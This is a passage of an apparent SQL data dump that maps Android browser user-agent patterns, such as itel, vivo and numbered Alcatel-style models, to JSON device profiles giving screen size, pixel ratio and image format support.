Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; i8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iLA-X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQD700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQE200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQF 200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQGW516) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQS300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQW503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iQW553N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iris60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iris80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; iris880) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_iris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel A31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel A42 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel A44) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel P31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel P51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel S12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel S32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; itel S32LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_itel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; m8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; meanIT_C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; mito A39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; mobiistar Zumbo S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; moto x4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; myA9 DTV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; myPhone CityXL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; myPhone Fun LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; myPhone xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; myPhone_C-Smart_4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; swisstone SD 530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; thl_Knight_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; thor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; tk6757_66_n1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vernee_M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; verykoolSL5565) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; verykools5205) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; verykools5528) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; verykools5702) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; victor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; visionbook P55 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1611) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1612) AppleWebKit/* (KHTML, like Gecko) Chrome','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1612) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1713) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1714) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1716) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1718) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; vivo 1719) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; xx A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; xx MIX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; xx Must) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; xx Note 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 16 X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 16th) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 2E E450 2018) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 2PS64) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 4034T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 4E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5003A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5003D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5003D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5003D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5003G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5008D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5008Y_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5008Y_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033D_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033F_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5033X_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5034D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 